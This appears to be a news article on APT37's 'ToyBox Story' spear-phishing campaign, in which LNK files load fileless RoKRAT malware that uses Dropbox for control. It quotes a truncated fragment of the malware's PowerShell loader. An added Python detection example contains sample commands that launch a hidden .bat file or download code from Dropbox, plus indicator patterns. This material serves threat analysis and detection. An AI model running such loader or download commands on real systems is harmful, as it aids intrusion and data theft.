In March 2025, a sophisticated spear-phishing campaign attributed to the North Korean state-sponsored hacking group APT37 was observed targeting activists focused on North Korean affairs.
The attackers crafted convincing emails disguised as invitations to academic forums from a South Korean national security think tank, with subject lines referencing current geopolitical events such as “Trump 2.0 Era: Prospects and South Korean Response” and information about “North Korean Troops Deployed to Russia.”
The malicious campaign leverages Dropbox links embedded within these emails, leading victims to download compressed archives containing shortcuts (LNK files) that execute fileless malware.
This technique, known as “Living off Trusted Sites” (LoTS), enables the attackers to bypass security controls by utilizing legitimate cloud services as command and control (C2) infrastructure, making malicious traffic difficult to distinguish from legitimate business communications.
Genians Security Center (GSC) identified and analyzed this campaign, naming it “Operation: ToyBox Story” based on distinctive keywords found in the malware.
Their researchers discovered that APT37 has evolved its tactics from previous campaigns but maintained core components like the RoKRAT malware family, which has been continually deployed with minimal code changes to maximize operational effectiveness while evading detection.
The impact of these attacks extends beyond immediate data theft, as the malware captures screenshots, collects system information, and maintains persistent access to compromised systems.
Security experts are particularly concerned about this campaign’s targeting of individuals working on North Korean issues, suggesting potential intelligence gathering objectives related to South Korean national security strategies.
Infection Mechanism and Technical Analysis
The infection chain begins when victims extract and execute the LNK files delivered through Dropbox.
Genians researchers identified that these shortcuts contain embedded PowerShell commands designed to extract and execute multiple components while displaying a decoy document to the victim.
The PowerShell code, structured to avoid detection, executes a sequence of operations that create three hidden files in the %Temp% directory.
```powershell
# Truncated excerpt of the LNK's embedded PowerShell as quoted in the report; the text before "k');" is cut off in the source.
# It searches the extraction directory for a file whose extension is in $exs and whose size is exactly 0x014F63F0 bytes
# (judging by the variable names, the oversized LNK itself), then opens it read-only so the embedded components can be carved out.
k');$lnkPath = Get-ChildItem -Path $dirPath -Recurse *.* -File | where {$_.extension -in $exs} | where-object {$_.length -eq 0x014F63F0} | Select-Object -ExpandProperty FullName ;$lnkFile = New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);
```
The analysis of the embedded shellcode reveals how the malware XOR-decodes its encrypted payloads and loads them directly into memory.
This fileless approach significantly reduces the malware’s footprint on disk, making traditional antivirus detection challenging.
When executed, the final payload, RoKRAT, establishes communication with command and control servers through Dropbox API calls that use stolen OAuth tokens.
“This threat actor demonstrates advanced operational security by purposely breaking up file extensions during runtime execution to avoid pattern-based detection,” noted the Genians threat intelligence team.
“For example, the ‘.bat’ extension is separated and recombined using string concatenation operators, significantly hampering signature-based detection methods.”
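The extension splitting described above is what a SOC hunt (the EDR-based anomaly hunting recommended later in the article) has to undo before pattern matching. The following is an added example, not code from the Genians report: it folds `'lit'+'lit'` concatenations in a PowerShell command line before checking indicators, so a split `.bat` or Dropbox reference becomes visible. The command lines are constructed samples; the indicator list and the no-escaped-quotes simplification are assumptions.

```python
import re

# Constructed sample command lines (not from the report) in the style the
# article describes: a file extension or hostname split across string
# literals and recombined with "+".
SAMPLE_CMDLINES = [
    "powershell -w hidden -c \"$p=$env:Temp+'\\upd.ba'+'t';Start-Process $p\"",
    "powershell -c \"$u='https://www.drop'+'box.com/s/x';iwr $u -o $env:Temp\\a\"",
    "powershell -c \"Get-ChildItem -Path $env:USERPROFILE -Recurse\"",
]

# 'lit' + 'lit' where neither literal contains a quote character.
# Assumption/simplification: escaped quotes inside literals are not handled.
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def fold_string_concats(cmdline: str) -> str:
    """Merge adjacent quoted literals joined by '+' until nothing changes."""
    prev = None
    while prev != cmdline:
        prev = cmdline
        cmdline = _CONCAT.sub(
            lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), cmdline
        )
    return cmdline


# Coarse indicators drawn from the behaviours the article describes
# (hidden .bat files in %Temp%, Dropbox used for delivery and C2).
INDICATORS = {
    "bat_extension": re.compile(r"\.bat\b", re.I),
    "temp_dir": re.compile(r"%temp%|\$env:temp\b", re.I),
    "dropbox": re.compile(r"dropbox", re.I),
}


def analyse(cmdline: str) -> dict:
    """Match indicators on the raw and on the folded command line.

    'hidden' lists indicators that only appear after folding: exactly the
    ones a naive signature on the raw command line would miss."""
    folded = fold_string_concats(cmdline)
    raw_hits = {n for n, rx in INDICATORS.items() if rx.search(cmdline)}
    folded_hits = {n for n, rx in INDICATORS.items() if rx.search(folded)}
    return {"folded": folded, "hits": sorted(folded_hits),
            "hidden": sorted(folded_hits - raw_hits)}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyse(line))
```

In practice the same folding is applied to PowerShell ScriptBlock logging or EDR process-creation events before any indicator matching.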
The RoKRAT malware, once active in memory, employs sophisticated encryption using both XOR obfuscation and AES-CBC-128 algorithms to protect its communications.
The malware captures screenshots, system details, and exfiltrates data to Dropbox using access tokens linked to Russian Yandex email addresses, including “[email protected]” and “[email protected].”
Organizations should implement EDR-based anomaly hunting capabilities to detect such fileless threats, as traditional signature-based approaches prove insufficient against these advanced persistent threats.
The continued use of cloud services as C2 infrastructure by APT37 highlights the growing challenge of distinguishing malicious from legitimate traffic in modern network environments.